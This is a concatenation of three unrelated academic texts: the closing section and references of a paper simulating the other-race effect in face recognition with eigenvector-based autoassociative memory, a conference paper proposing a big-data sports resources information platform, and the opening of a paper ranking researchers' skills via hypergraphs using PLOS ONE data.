set of dimensions and, thus, the eigenvectors with smaller eigenvalues may be dis- carded without losing much information about the structure of the stimulus set. Likewise, recall from an associative memory can be carried out using a smaller number of eigen- vectors (cf. equation (4)). The criterion for an ac- ceptable number of dimensions in this case, how- ever, is one that maintains an acceptable (but not perfect) level of recognition performance. Recognition Memory for Same- and Other-race Faces To simulate a recognition memory task we need to model two components of memory, a long-term experience component (i.e. face race history) and a short-term face recognition task. We expect expe- rience to affect the short-term recognition task in the ways outlined above. For the purpose of com- pleteness, we report two simulations. In the first, we tested the ability of the autoassociative memory to distinguish between OLD and NEW faces for a majority matrix. In the second, we added a short- term component to this matrix, which consisted of half Caucasian and half Japanese faces. We then examined the ability of the model to discriminate OLD from NEW faces for these additional faces. We should note that we do not believe that this is the only or even best way to simulate such a task. We feel that it is the simplest way, however, and so we chose to explore this method first. Method The matrix was tested for accuracy with a Yes/No procedure as follows. Learned Caucasian and Japanese faces (OLD) and NEW Caucasian and Japanese faces were reconstructed. The qual- ity of the reconstructions was measured as the co- sine between the original and reconstructed im- ages. A Yes/No recognition procedure was imple- mented by setting a criterion cosine value β and by assigning a ‘Yes’ to faces for which the cosine between the original and reconstructed image ex- ceeded the criterion and ‘No’ to faces for which the cosine was less than the criterion β. The most direct choice for β is the mean of the cosine dis- tribution means for the reconstructed OLD faces and the reconstructed NEW faces. Signal detec- tion methodology maps easily onto this Yes/No task since the distribution of cosines for OLD faces can be thought of as the signal distribution and the distribution of cosines for NEW faces as the noise distribution. OLD faces with cosines greater than β are considered hits and NEW faces with cosines greater than β are considered false alarms. A d′ score may then be computed in the standard way. Also, since the distribution of cosines for the signal (i.e. the OLD faces) and the distribution of cosines for the noise (i.e. the NEW faces) are known com- pletely, a ROC curve may be plotted by choosing β values and calculating the hit and false alarm rates that would result from using these different crite- ria. Results and Discussion To test the accuracy of the models, we used all of the OLD faces (100 faces: 95 majority and five minority) and a sample of 120 NEW faces, approx- imately half Japanese and half Caucasian. The ac- curacy of the model using all the eigenvectors was essentially perfect. We degraded the simulations, therefore, by using smaller numbers of eigenvec- tors. Figure 3 (a and b) displays ROC curves for the performance of the Caucasian and Japanese majority models, respectively, with three different numbers of eigenvectors contributing to the recon- struction. For both majority simulations, 10 eigen- vectors yielded excellent performance. Dividing the faces into majority and minority face groups did not show the cross-race effect. That is, major- ity faces did not yield larger values of d′. This is likely to be due to the fact that only five minority- SIMULATING THE OTHER-RACE EFFECT 171 Figure 3. ROC curves for the performance of the (a) Caucasian and (b) Japanese majority (95%) models. Perfor- mance is plotted with different numbers of eigenvectors contributing to the reconstructions. 172 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT Figure 4. ROC curves for the long-term experience and short-term recognition Caucasian majority matrix. race faces were used in these simulations and that race was probably the largest category difference in these simulations and is, therefore, likely to be represented in the first few eigenvectors. We then simulated the short-term component by recalling faces combining the eigenvectors from the long-term majority matrix and the short-term half-Caucasian (n = 40) and half-Japanese (n = 40) matrix, weighting the long-term component at 0.75 and the short-term component at 0.25 5. We report a simulation only for the Caucasian major- ity matrix6. Here we see the classic cross-race ef- fect, with the Japanese faces being more difficult to recognize (i.e. to separate OLD from NEW in the short-term recognition task) than the Caucasian faces. The ROC curves for this simulation are dis- played in Figure 4. The eigenvectors as features. Recalling faces from the autoassociative matrix is carried out by summing together a weighted combination of eigenvectors. That is, the faces are ‘put together’ by adding up the eigenvectors in differentially weighted combinations. As such, by most psycho- logical definitions, the eigenvectors can be thought of as features of the faces. This interpretation of eigenvectors in associative matrices has been pointed out by Anderson et al. (1977). Also, in the context of low-dimensional representation of images, Sirovitch & Kirby (1987) suggest an 5 These numbers are arbitrary and are simply an at- tempt to give more weight to the long-term experience than the short-term recognition task. 6 This is because we do not yet have a sufficient number of Japanese faces available to complete the analysis for the Japanese faces. SIMULATING THE OTHER-RACE EFFECT 173 Figure 5. (a) The first four eigenvectors for the Caucasian majority simulation. 174 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT Figure 5. (b) (b) The first four eigenvectors for the Japanese majority simulation. SIMULATING THE OTHER-RACE EFFECT 175 eigenvector-based description. Applied to the current work, the eigenvectors of a matrix of face images are a different sort of feature than has generally been used in describ- ing faces. For one thing, the eigenvectors repre- sent global and not local features, since they span the face. Secondly, with the exception of the first eigenvector in each of these simulations, the eigen- vectors are not readily interpretable in a traditional feature sense. The first four eigenvectors for the Caucasian majority simulation and the Japanese majority simulation are displayed in Figure 5 (a and b). It should be noted that the eigenvectors are face-like. Furthermore, the eigenvectors resemble somewhat the majority race of the matrix. The first eigenvector contains characteristics typical of the majority race (e.g. note the roundness of the eyes and face in the Caucasian majority eigenvectors, and the squareness of the face and distinctiveness of the nostrils for the Japanese majority eigenvec- tors). Finally, for completeness, Figure 6 shows the first eigenvector of each majority matrix made from a pixel-based code without spatial differen- tiation. The race differences are even more strik- ing in these cases since shading information is pre- served. General Summary and Discussion The purpose of these simulations was to model some common effects associated with processing other-race faces. We have tried to show that these effects can be modeled, in part, as a process of fine tuning to the information most useful for distin- guishing faces within a homogenous set (i.e. a sin- gle race of faces). This tuning is suboptimal for processing other-race faces, however, and the sys- tem shows a number of shortcomings for the mi- nority faces as compared to the majority faces. Our simulations produced three results. First, when the face history of a network was strongly biased to- ward a single race of faces, the model’s ability to represent novel faces from this race exceeded its ability to represent faces from another race. Sec- ondly, an autoassociative network trained on a ma- jority race produced codings that were more sim- ilar to one another for faces of the minority race than for faces of the majority race. This simulates the well-known effect of faces of another race all appearing similar to one another. Finally, by com- bining a long-term face history experience matrix with a short-term recognition matrix, we simulated the other-race effect with majority faces being bet- ter recognized than minority faces. While the system produced a number of effects that are qualitatively similar to those seen in the psychological literature, we caution that this ap- proach is perhaps best thought of, not as a model of face recognition, but as an exploratory tool for quantifying and processing subtle perceptual infor- mation in complex images such as faces. It is also, not the only approach to simulating the other-race effect. Used in this context, it provides a method for examining other kinds of codings that might account for these effects in a similar fashion. Fur- thermore, its application might give insight into the constraints that extensive experience with a given stimulus category place on the processing of stim- uli from another category. We think that this is especially important in cases where it is difficult to quantify the subtle visual information that sepa- rates the categories. Finally, we think the model also has potential as a tool for simulating some other well-known ef- fects in face memory, such as the relationship be- tween typicality and recognition memory. Further- more, it might be useful for giving insight into the perceptual components of the recognition difficul- ties encountered with inverted faces and with faces presented in the photographic negative. For these effects, it is instructive to pursue some simple per- ceptual explanations before looking at other more complicated explanations. References Abdi, H. (1988). A generalized approach for connectionist auto-associative memories: interpre- tation, implications and illustration for face pro- cessing. In J. Demongeot (Ed.) Artificial In- telligence and Cognitive Sciences. Manchester: Manchester University Press. Anderson, J. A., Silverstein, J. W., Ritz, S. A. & Jones, R. S. (1977). Distinctive features, cate- gorical perception and probability learning: some 176 O’TOOLE, DEFFENBACHER, ABDI, & BARTLETT Figure 6. The first eigenvector of a Caucasian and Japanese majority matrix made from a pixel-based code without spatial differentiation. applications of a neural model. Psychological Re- view, 84, 413–451. Bothwell, R. K., Brigham, J. C. & Malpass, R. S. (1989). Cross-racial identification. Personality and Social Psychology Bulletin, 15, 19–25. Brigham, J. C. (1986) The influence of race on face recognition. In H. D. Ellis, M. A. Jeeves, F. Newcombe & A. Young (Eds) Aspects of Face Processing. Dordrecht: Martinus Nijhoff. Brigham, J. C. & Barkowitz, P. (1978). Do “they all look alike?” The effect of race, sex, ex- perience, and attitudes on the ability to recognize faces. Journal of Applied Social Psychology, 8, 306–318. Brigham,J. C., Malpass, A., Snyder, L. S. & Spaulding, K. (1982). The accuracy of eyewitness identification in a field setting. Journal of Person- ality and Social Psychology, 42, 673–681. Chance, J. E., Turner, A. L. & Goldstein, A. G. (1982). Development of differential recognition of own-and other-race faces. Journal of Psychology, 112, 29–37. Cross, J. G., Cross, J. & Daly, J. (1971). Sex, race, age and beauty as factors in recognition of faces. Perception & Psychophysics, 10, 393–396. Deffenbacher, K. A. & Loftus, E. F. (1982). Do jurors share a common understanding concerning eyewitness behavior? Law and Human Behavior, 6, 15–30. Feingold, C. A. (1914). The influence of envi- ronment on identification of persons and things. Journal of Criminal Law and Police Science, 5, 39–51. Feinman, S. & Entwistle, D. R. (1976). Chil- dren’s ability to recognize other children’s faces. Child Development, 47, 506–510. SIMULATING THE OTHER-RACE EFFECT 177 Goldstein, A. G. & Chance, J. E. (1985). Effects of training on Japanese face recognition: Reduc- tion of the other-race effect. Bulletin of the Psy- chonomic Society, 23, 211–214. Hopfield, J. J. (1984). Neurons with graded re- sponses have collective computational properties like those of two-state neurons. Proceedings of the National Academy of Sciences, 81, 3088–3092. Kohonen, T. (1984). Self Organization and As- sociative Memory. Berlin: Springer Verlag. Malpass, R. S. (1981) Training in face recog- nition. In G. Davies, H. Ellis & J. Shepherd (Eds) Perceiving and Remembering Faces. Lon- don: Academic Press, pp.271-285. O’Toole, A. J. & Abdi, H. (1989). Connection- ists approaches to visually based feature extrac- tion. In G. Tiberghien (Ed.) Advances in Cognitive Psychology, Vol. 2. London: Wiley. O’Toole, A. J., Millward, R. B. & Anderson, J. A. (1988). A physical system approach to recogni- tion memory for spatially transformed faces. Neu- ral Networks, 1, 179–199. Shapiro, P. N. & Penod, S. D. (1986). Meta- analysis of face identification studies. Psychologi- cal Bulletin, 100, 139–156. Sirovitch, L. &. Kirby, M. (1987). Low- dimensional procedure for the characterization of human faces. Journal of the Optical Society of America, 3, 519–524. work_f2qw6snsczggpc7yochevefzie ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 28 Research on the Construction of Sports Resources Information Platform Based on Big Data Wang Shuangming 1,2 1. Malaysia University of Science and Technology Kuala Lumpur, Malaysia 2. Dean's Office, Xi'an Siyuan University Xi'an, China e-mail: 646422452@qq.com Shi Jianwei Personnel office, Xi'an Siyuan University Xi'an, China e-mail: 95003882 @ qq.com Fu Shiqiu College of Liberal Arts Xi'an Siyuan University Xi'an, China e-mail: 137792522 @ qq.com Xu Wanlin Sports departmen Xi'an Siyuan University Xi'an, China e-mail: 957294947 @ qq.com Abstract—The rapid development of communication technology such as big data makes the integration and application of sports resource information become the key of sports informatization construction. The construction of sports resources information big data platform is of great significance to the integration of sports resources and the sharing of sports resources. The subject explores the related theory of sports resources, studies the present situation of the application of sports resources, constructs the overall construction framework of sports resources information big data platform, analyzes and designs the functions of each subsystem, and discusses the performance evaluation of sports resources information big data platform. Keywords-Big Data; Sports Resources Information; Platform Construction I. INTRODUCTION A. The advent of big data era The State Council's "Outline for Accelerating the Development of Big Data" (GuoFa [2015] No. 50) states: The convergence of information technology and economic society has led to the rapid growth of data. The data have become a national basic strategic resource. Big data is increasingly being used globally, with an important impact on global production, circulation, distribution, consumption activities as well as economic operation mechanism, social life style and national governance ability.[1] At present, China ranks first in the world in the scale of Internet and mobile Internet users with abundant data resource and application market advantages. Breakthroughs have been made in key data technology research and development in some big data sectors. A number of Internet innovative enterprises and innovative applications have emerged. Some local governments have started big-data-related work. Insisting on innovation-driven development, accelerating the deployment of big data and deepening the application of big data have become the inherent and necessary choices of stabilizing growth, promoting reforms, adjusting structure, benefiting people's livelihood, and promoting the modernization of government governance.[2]Big data technology opens up a whole new era of opportunities and challenges. Big data is a data set featuring large capacity, multiple types, high speed access and high application value. It is rapidly evolving into collecting, storing and associating and analyzing a large amount of data with diverse sources and diverse formats, which will discover new knowledge, create new values and upgrade new capabilities in a new generation of information technology and service forms. [3] Big data is featured by massive scale, high-speed circulation and rich forms, which has been widely used and developed in IT, aviation, e-commerce and other industries. Big data complements and improves traditional data collection methods, which expands the breadth and depth of data usage. B. The development of sports informatization The emergence of "Internet+" has promoted the innovation and development of information technology in the industry.[4] "National Fitness Program (2016-2020)" pointed out that we must promote depth integration between "Internet+", big data and other information technology and the National Fitness Program, so as to facilitate the construction of national fitness public service information platform.[5] The "13th Five-Year Plan for Sports Development" issued by General Administration of Sport of China affirmed that "Internet+" has infused new vitality into sports development and should make full use of new technologies to develop various types of APP to open up the customer market.[6] Under the guidance of the programmatic documents, sports informatization has made some progress. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 29 C. Sports resources integration needs "The contradiction between the growing mass sports demand and the relative insufficiency of social sports resources "[7] has become increasingly acute. Relevant statistics show that the number of people who regularly participate in physical exercise in China has increased by 5.7% in the recent seven years, while that of sports supported by public finance has dropped by 0.13%. On the one hand, there are largely idle sports facilities which are heavily subsidized by the government for large- scale sporting events. Most sports venues built by individuals or social groups are poorly equipped with few visitors, and the utilization rate of sports facilities in schools and enterprises is low; on the other hand, residents can not find a place suitable for exercise. The reasons are as follows: first, the distribution of public sports resources is not balanced; second, the dislocation of supply and demand of sports resources "aristocratic supply" and "civilian needs"; third, the information asymmetry of supply and demand of sports resources. Taking "Internet+" as an opportunity, we shall use big data technology to build a sports resource information platform to precisely match users and sports resources and improve the utilization rate of sports resources and satisfaction of all parties. II. OVERVIEW OF SPORTS RESOURCES BIG DATA A. Sports informatization The ultimate goal of sports development is to better provide the public with satisfying sports products and services. The matching degree between sports informationization and public demand can most directly reflect the construction results of sports. Judging from the current situation of the development of sports informationization, there is still a big gap between sports information service and public demand, which is mainly manifested in the following three aspects: 1) Less capable of collaborative development:Sports information management agencies are always at a low level, we do not attach importance to the training and stability of the sports information personnel, with the lack of necessary follow-up financial security. Sports information construction is not highly motivated by the management level, operational level and the implementation level or with inconsistent understanding, and there is no system or mechanism to organize and coordinate the relationship among the government, sports departments and the masses, leading to the lack of sustainable development of sports information construction. 2) The level of information technology application is generally low:Due to the fragmentation of the application of sports information technology, the poor circulation of information resources and the low involvement of new technologies, the scientification degree of sports management, planning, development and decision-making is low. The success stories of sports information systems are few, also with the lack of key projects promoted by works in all areas. 3) Inefficient access to service information:The growth of service resources failed to meet the growing public demand and public satisfaction was poor. On the one hand, the release of service information is often limited to the news media, policy documents, government websites, etc. The coverage and transmission speed of information are affected to some extent, and the public can not obtain real-time, comprehensive and accurate service information through mobile terminals. On the other hand, there are too few valuable service functions available online, resulting in low public participation. As for the specific sports resources big data, it also faces many challenges. The problems that need to be solved are as follows: The old and new software and hardware systems are difficult to integrate in depth, and the applications and data based on the system are featured by low relevance and poor sharing; Unscientific data classification and low data utilization; Large differences among data formats and serious data redundancy. Sports resource information big data content is huge, which involves a large number of departments, so we shall properly solve the above problems and make the sports resources information database to better serve the public. B. Concept of Sports Resource Information Platform Based on Big Data The information technology is used to mine the information contained in the big data of sports resources and store the information according to certain rules, so that a massive sports information database is constructed, and a multi-user information platform is constructed based on the sports resources information database. Such a platform is called sports resources information big data platform. III. ANALYSIS AND DESIGN OF SPORTS RESOURCE INFORMATION PLATFORM BASED ON BIG DATA A. Construction Principles of Sports Resource Information Platform Based on Big Data The construction principles of Sports Resource Information Platform Based on Big Data include: 1) Unity:The development of a unified technical specifications. the construction of the sports resources information platform based on big data must adopt a unified technology architecture, so as to ensure the smooth implementation of the system and good application results. 2) Security: The platform security is the lifeblood of the platform, so we should attach great importance to platform application security, data security and overall security in the platform implementation process. Upholding the principle of reliability, we shall to the maximum extent possible avoid business failures due to technical failure. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 30 3) Reliability: The platform should use mature technologies and interfaces to make full use of the existing sports resource applications to avoid the construction risk and the use risk of the platform due to technical defects. 4) Scalability: The sports resource information platform based on big data should be designed and developed based on the needs of the sports management department, sports resource providers and sports resource users, and should give full consideration to the adaptability of the platform to the business changes of all stakeholders. The platform design and development may reduce the impact of business changes on the platform and achieve stable support for business changes through proper expansion and simple modification of the platform. 5) Forward-looking: The platform construction should be forward-looking, and we must consider the needs of business updates in the next few years, learn from the advanced international and domestic experience, and adopt the successful technology of information platform construction so that the platform can reflect the advanced nature in the future. B. Business Framework of Sports Resource Information Platform Based on Big Data With the deepening of the concept of "Internet+", sports informationization has also been developed. Sports administrations and Sports Industry Management Co., Ltd. have basically constructed portals and APP applications. We should build platforms on this basis and make overall planning in advance to further clarify the platform business framework. The business on sports resources information big data platform in accordance with the occurrence of the object can be divided into: management department-to-management department, management department-to-business and business-to-business users. There are many sources of information on sports resources, which can be divided into internal systems of management departments and external systems of management departments. The internal systems of management departments include: track and field training center, stadium management committee, sports industry group Co., Ltd., stadiums, sports service guarantee center, etc.; external systems include: sports facilities of enterprises and institutions, fitness centers organized by social forces. We shall build a sports resources information big data platform and tap existing sports resources data to provide support and services for various applications that require sports resource data. C. Construction of sports resources information big data platform Based on the sports resource information of relevant agencies such as the sports management department, enterprises and institutions and the fitness center held by the social forces, the big data platform of sports resources information, through the mining of data, provides support for the sports resources information applied in the management department, the relevant units and individuals based on sports resources information sharing mechanism. 1) Framework of sports resources information big data platform The data platform shall comply with the construction standards and the Basic Requirements for Protection of Security Level of Information Systems (People's Republic of China National Standard GB/T 22239-2008) and shall be constructed by the infrastructure, big data system and big data application system. Standard system: a scientific and feasible standard system is a key factor for the successful construction of a big data platform for sports resources information. We shall establish the "sports resources information big data platform expert committee", and the expert committee shall develop data platform technical standards, management standards and safety regulations. Security: security system is the lifeline of the big data platform of sports resources information. We shall make full use of the technical features of big data platform to prevent illegal invasion and vulnerability attacks and strengthen the establishment of security clearance system with virus clearing and access setting as the core so as to ensure the data security and system security of the sports resources information big data platform. Infrastructure: The construction of a big data platform for sports resources information requires the existing sports resources information of sports management departments, sports institutions and enterprises and fitness centers organized by social forces, and needs to collect real-time data from these departments. The stable, reliable and secure network channel, powerful hardware and software systems are the necessary conditions for the completion of data collection and integration. We should further increase the intensity of infrastructure construction, optimize the network system, upgrade and update the computer hardware and software equipment, and lay a solid material foundation for the big data platform. Big Data System: Sports Resource Information Big Data System includes support data, data exchange and integration system, catalog management system, operation and maintenance system. The data exchange and integration system will be distributed in different business systems, diversified data collection, cleaning, exchange and integration and other operations. The processed data is then stored by the catalog management system. Big Data Application: Big Data Application System is the core of big data platform of sports resource information and also the key to realize various applications. The platform can provide various types of big data services to sports management departments, enterprises and public institutions, fitness centers and individuals. For example, the sports administration department monitors the sports stadiums in real time; the user reserves the venue through the terminal according to the stadium distribution and the number of real- time users; and the user reserves the courses online according to the contents and time of the coach. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 31 D. Design of sports resources information big data platform The sports resources information big data platform includes: support data, data exchange and integration system, catalog management system, operation and maintenance management system, interface system and platform system. The structure of sports resources information big data platform is shown as in Figure 1. Figure 1. Structure of Sports Resources Information Big Data Platform 1) Support data The support data can effectively connect sports resources information big data platform and sports resources database, and also can support the normal operation of other systems. It mainly contains metadata, exchange data, directory data, management data and security data. The metadata, also known as the intermediary data, is the information about the organization of the data, the data fields and their relation. In short, the metadata is the data about the data; the exchange data is generated during the data exchange, which includes node data, parameter management Information, etc .; the directory data is mainly the directory information of sports information resource; the operation and other information generated by the operation and maintenance system collectively referred to as management data; the system failure frequency information and system security analysis data that record security situation of sports resources information big data platform becomes safety data. 2) Data exchange and integration system The data exchange is based on a unified network and exchange protocol to achieve the exchange of information on sports resources between the relevant departments, avoid data chaos and repeat in the process of running exchange so as to achieve the synchronization of sports resources information and ensure data stability and security. The data exchange business model is shown in Figure 2. Figure 2. Data Exchange Business Model The main function of data integration is collecting, cleaning, exchanging and integrating the sports resource information data dispersed in various departments, re- analyzing the data collection for relevance and causality and digging data deeply to form new and more valuable data resources. Data integration service system includes modules of integrated configuration, component management, process management and integration results information query. The integrated configuration module is used for dynamically configuring and integrating rules. The component management module is used to package data cleaning, conversion, alignment and splitting. The process management module is used for process management of various processes in the integration and implementation process; The integrated result information query module is used to provide query and statistics of the data integration results. The data integration business model is shown in Figure 3. Figure 3. Data Exchange Business Model 3) Catalog management system The catalog management system achieves its functionality through three subsystems like cataloging, transmission, management and service. Catalog system finishes metadata assignment and generates the contents of the directory in accordance with predetermined standards; 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 32 directory transmission system completes the transmission of the directory contents between databases; directory management and service system realizes directory content audit, query, publishing and other functions. 4) Operation and maintenance management system The O&M Management System realizes the daily operation and maintenance and the security of Big Data Platform of Sports Resource Information. The main functions are as follows: User Management: This function is mainly used to distinguish between the providers, managers and users of sports resource information, and users with different identities have different permissions; Resource Management: This function is mainly used for the management of metadata, with the query function; Application Management: This function is mainly used for reviewing and sorting out the distributed sports resource information, and charging the released information of paid sports resources; Security Maintenance and Management: realizing such functions as user identity authentication, data encryption and transmission, real-time data backup, and recording daily access status and fault information. 5) Interface system The interface system is a channel for developers to call sports resource information. With this channel, developers can integrate the service of the platform with their own existing applications and directly develop the big data platform of sports resource information. 6) Platform system The running window of sports resources information big data platform is the platform system. The platform system is user-oriented, providing support services according to different needs, which is used for a variety of platform-based applications in order to achieve the construction of sports resources information big data platform. IV. PERFORMANCE EVALUATION OF SPORTS RESOURCES INFORMATION BIG DATA PLATFORM The objective evaluation of sports resources information big data platform is to master the use of sports resources information, improve the utilization of sports resources, further promote the development of sports informatization and improve the physical fitness of the people. The selection of performance evaluation indicators should be clear and easy to operate, combining qualitative indicators with quantitative indicators, establishing a performance evaluation index system that objectively reflects the big data platform of sports resources information, and scientifically evaluating the big data platform of sports resources information. V. CONCLUSION The Big Data Platform for Sports Resource Information covers such big data as investment in sports resources, costs, prices and benefits, involving sports management departments, enterprises and institutions, and fitness centers organized by social forces. Through the data cleaning, mining and other operations to sports resource information and based on the sports resource information sharing mechanism, the platform can provide the support of sports resource information applications. Problems such as unbalanced distribution of public sports resources, dislocation of supply and demand of sports resources and informatoin asymmetry of supply and demand of sports resources must be solved technically and the pace of sports information construction in China shall be accelerated to further enhance the national physique. ACKNOWLEDGMENT Subject: Routine Subject of Sports Bureau of Shaanxi Province in 2017: Big-Data-based Research on Integration and Application of Sports Resource in Shaanxi Province (Project No.17087); Annual University-level Research Project of Xi'an Siyuan University in 2016: Planning and Research on Campus Card System(Project No.XASY-B1619). REFERENCES [1] [2] China State Council, Action Program for Big Data Development, [EB/OL] .http: //www.gov.cn/zhengce/content/2015- 09/05/content_10137.htm, August 28, 2017. (references) [3] Qu Haixu, Zhang Hujun and Cui Haiqing, Development and Application of Production and Operation Simulation System of Oil Company Based on Big Data [J]. [4] Zhang Jingbo, Research on the Improvement of Computer Network Reliability under the Background of "Internet+" [J] .Journal of Liaoning Higher Vocational Technical Institute, vol.19 (06), pp.85- 87, 2017. [5] General Administration of Sport of China, National Fitness Program (2016-2020) [EB/OL] .http: //www.sport.gov.cn/n317/n10506/c730866/content.html, August 28, 2017. [6] General Administration of Sport of China, "13th Five-Year Plan" for Sports Development, [EB/OL] .http: //news.xinhuanet.com/sports/2016-05/05/c_128960270.htm, August 28, 2017. [7] Liu Liang and Wang Hui, Dispelling and Reforming Ways of Supply and Demand Contradictions of Public Sports Resources in China from the Perspective of Supply-side Reform [J]. Journal of Wuhan Institute of Physical Education, vol.50 (04), pp.53-55, 2016. work_f4yconvfenhincqamk2qowk37q ---- Submitted 21 November 2018 Accepted 11 February 2019 Published 4 March 2019 Corresponding author Xiaomei Bai, xiaomeibai@outlook.com Academic editor Diego Amancio Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.182 Copyright 2019 Kong et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Skill ranking of researchers via hypergraph Xiangjie Kong1, Lei Liu1, Shuo Yu1, Andong Yang1, Xiaomei Bai2 and Bo Xu1 1 Key Laboratory for Ubiquitous Network and Service Software of Liaoning Province, School of Software, Dalian University of Technology, Dalian, China 2 Anshan Normal University, Computing Center, Anshan, China ABSTRACT Researchers use various skills in their works, such as writing, data analysis and experiments design. These research skills have greatly influenced the quality of their research outputs, as well as their scientific impact. Although many indicators have been proposed to quantify the impact of researchers, studies of evaluating their scientific research skills are very rare. In this paper, we analyze the factors affecting researchers’ skill ranking and propose a new model based on hypergraph theory to evaluate the scientific research skills. To validate our skill ranking model, we perform experiments on the PLOS ONE dataset and compare the rank of researchers’ skills with their papers’ citation counts and h-index. Finally, we analyze the patterns about how researchers’ skill ranking increased over time. Our studies also show the change patterns of researchers between different skills. Subjects Algorithms and Analysis of Algorithms, Computer Architecture, Social Computing Keywords Hypergraph model, Skill ranking, Researcher evaluation INTRODUCTION The burst of development in science contributes to an expansion of knowledge and technology. It also leads to many new disciplines and interdisciplines emerging in universities (Lee, Xia & Roos, 2017). Scientific cross-disciplinary collaboration brings positive effects to improve the productivity and quality of researchers’ outputs. Collaboration has become a common phenomenon in people’s daily life for a long time. More and more works are finished with the form of collaboration, such as project and assignment, patent, software development and scientific papers. The patterns of collaboration and teamwork have attracted the interest of researchers in many disciplines (Kong et al., 2017). Organizations like funding agencies, universities, enterprises, etc. are also concerned about team-based issues to improve the productivity and boost the profits. Many state-of-art works have been proposed to analyze the pattern of collaboration and optimize the team structure. Many efforts have been made to analyze and optimize teams in terms of their topology structure (Milojević, 2014; Kong et al., 2018; Wang et al., 2017), which have made great contributions. However, team effectiveness not only depends on the appropriate team topology structure, but also depends on their function component, such as the abilities and skill distributions of team members (Li et al., 2017). Some works built, evaluated and refined teams in consideration of both skills of team members and the team topology structure (Li et al., 2017; Wang, Zhao & Ng, 2016). How to cite this article Kong X, Liu L, Yu S, Yang A, Bai X, Xu B. 2019. Skill ranking of researchers via hypergraph. PeerJ Comput. Sci. 5:e182 http://doi.org/10.7717/peerj-cs.182 https://peerj.com mailto:xiaomeibai@outlook.com mailto:xiaomeibai@outlook.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.182 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.182 Quantifying individual’s ability and impact is a key point for solving the problems of team building, evaluation and refinement. It is also needed in many other practical applications; for example, awards granting, score assessment and scholarship awarding. However, how to evaluate a researcher’s ability with limited resources in the diverse academic circumstance is still under exploration. Under the scenario of big scholarly data, a large number of data-driven indices and measures were proposed to evaluate the impact of researchers reliably (Xia et al., 2017). In the early years, h-index (Hirsch, 2005) was proposed to evaluate both the publication quantity and quality of researchers based on the number of papers and the citations of the highly cited paper. A researcher with an index h means that he/she has h published papers and each of them has been cited at least h times. The index has been proved to be a simple but valid measure in evaluating scholars’ scientific impact (Bornmann & Daniel, 2005). The h-index has become a frequently used index and has been applied to solve many problems by scholars. Besides, many other indices are proposed to evaluate the performance and impact of researchers, such as g-index (Egghe, 2006), S-index (Sawilowsky, 2012) and AIF (Pan & Fortunato, 2013). Another frequently used measure is Q parameter (Sinatra et al., 2016), which is a unique parameter to capture the ability and evaluate the impact of a scientist. In recent works, methods of ranking authors in a heterogeneous network have been proposed (Meng & Kennedy, 2013; Liu et al., 2014), in which multi-types of vertices and relationships are taken into consideration. However, these measures are proposed to evaluate researchers’ abilities and impact on the macro level. They cannot reflect a researcher’s proficiency with a particular skill. Using these measures to solve some practical problems may influence the accuracy of the results. Researchers’ skill sets have been used in solving many problems, such as team formation, team member replacement and team refinement (Kong et al., 2016). Many researchers use terms extracted from the paper’s keywords and title or conference and journal name as authors’ skills (Li et al., 2017). They only consider a binary relationship between researchers and skills, that is, whether a researcher has a particular skill. However, in real-life practice, the relationship between researcher and skill is more complicated. The skillfulness of an expert should be taken into consideration according to his previous experience. Farhadi et al. (2011) proposed a skill grading method in team formation problem. They proposed a complex formula based on the similarity between scholars and their possessed skills to calculate the skillfulness level. Many works used authors’ contribution information to measure their impact and analyzed collaboration patterns of authors (Persson, 2017; Paul-Hus et al., 2017; Rahman et al., 2017; Corrêa Jr. et al., 2017; Biswal, 2013). The contribution information can also be used in credit allocation and ranking authors (Sekercioglu, 2008; Dance, 2012). The contributions are mainly extracted from acknowledgements of papers, or contribution information in journals like PLOS journals, the British Medical Journal and the FEBS Journal. Other skill evaluation methods are proposed for measuring workers’ skills, where the skills are extracted from job seekers’ resumes in the online job market (Zhou et al., 2017; Anderson, 2017) and online social platform (Alvarez-Rodríguez & Colomo-Palacios, 2014). For example, in economic issues, skills are extracted for analyzing the relationship between skill and wage (Anderson, 2017) Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 2/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 and reducing the skills gap (Zhou et al., 2017). However, these methods are mainly proposed to solve problems in labor economics, but cannot be used to evaluate the skills for students and researchers. Despite their success in evaluating a researcher’s impact and ability to some extent, a fine-grained method that quantifies researchers’ skill level is still needed now. In this paper, we analyze the factors affecting scientific skill ranking, and construct a heterogeneous network for mapping them into a hypergraph. We present measures to calculate the weights of the edges in the heterogeneous network. The degree of skillfulness for a researcher is denoted as the weight of the hyperedge, which is calculated by a method inspired from the Laplace kernel function. Our contributions are summarized as follows: • Model establishment. We carry out data and empirical analysis on the features that influence the proficiency of researchers’ skills, and then we establish a Skill Ranking Model (SRModel) to evaluate the skillfulness of researchers via hypergraph. • Dataset construction. We construct a dataset by crawling information from PLOS ONE journal website, including 164,543 papers authored by 684,844 researchers with 10 kinds of skills aggregated by contributions. • Skill ranking analysis. We perform our model on the PLOS ONE journal dataset to validate the effectiveness of the model and the pattern of how scholars’ skill ranking increased over time. BACKGROUND Facing the highly competitive academic society, researchers have to master a wider variety of skills and knowledge to improve personal strength. Besides, the discipline integration and the researcher’s skill migration have become a trend in academia with the rapid development of science and technology. It is a great challenge to rank skills of researchers under such complex conditions. In this part, we aim at figuring out what influence the researchers’ skill ranking according to data analysis and empirical analysis. We use data collected from the PLOS ONE journal website to make an investigation and carry out our analysis. The PLOS ONE dataset contains over 170,000 articles collected from the journal website. These papers’ publication years range from 2006 to June 2017. The dataset includes paper title, publish year, authors, number of citations, disciplines and more specifically, authors’ contributions. More details will be introduced in the ‘Experiment Setting’ section. Science and technology are playing important roles in promoting the growth of productivity owing to the unprecedented achievement the researchers have made recently. This development tendency also leads to a burst of complex tasks that need to be solved by working together among experts in different fields. The disciplinary collaboration has reduced the 